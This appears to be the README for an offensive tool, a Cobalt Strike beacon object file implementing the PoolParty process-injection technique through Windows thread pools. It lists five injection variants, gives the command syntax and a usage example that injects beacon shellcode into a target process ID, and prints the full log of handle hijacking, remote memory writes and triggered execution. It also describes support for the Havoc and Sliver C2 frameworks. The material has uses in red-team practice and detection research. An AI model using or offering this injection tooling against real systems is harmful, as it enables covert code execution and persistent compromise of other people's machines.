A beacon object file implementation of PoolParty Process Injection Technique by @SafeBreach and @0xDeku, that abuses Windows Thread Pools. The BOF supports the 5 technique/variant:
- Insert TP_IO work item to the target process's thread pool.
- Insert TP_ALPC work item to the target process's thread pool.
- Insert TP_JOB work item to the target process's thread pool.
- Insert TP_DIRECT work item to the target process's thread pool.
- Insert TP_TIMER work item to the target process's thread pool.
I will try to keep adding remaining variants.
PoolPartyBof <Process ID> <Path To Shellcode> <Variant>
- Usage Examples
PoolPartyBof 2136 /tmp/beacon_x64.bin 4
[*] Opening 2136 and running PoolParty with /tmp/beacon_x64.bin shellcode!
[+] host called home, sent: 314020 bytes
[+] received output:
[INFO] Shellcode Size: 307200 bytes
[+] received output:
[INFO] Starting PoolParty attack against process id: 2136
[+] received output:
[INFO] Retrieved handle to the target process: 0000000000000670
[+] received output:
[INFO] Hijacked worker factory handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO] Hijacked timer queue handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO] Allocated shellcode memory in the target process: 00000290C91B0000
[+] received output:
[INFO] Written shellcode to the target process
[+] received output:
[INFO] Retrieved target worker factory basic information
[+] received output:
[INFO] Created TP_TIMER structure associated with the shellcode
[+] received output:
[INFO] Allocated TP_TIMER memory in the target process: 00000290C9200000
[+] received output:
[INFO] Written the specially crafted TP_TIMER structure to the target process
[+] received output:
[INFO] Modified the target process's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER
[+] received output:
[INFO] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[+] received output:
[INFO] PoolParty attack completed.
The BOF can be further used with Process Injection Hooks provided within Cobaltstrike, and Rastamouse has a perfect blog too.
Added Havoc BOF support. You are welcome to open an issue, if something doesn't work. For sliver C2 it partially works, but Somehow the remote process crashes when executed the shellcode.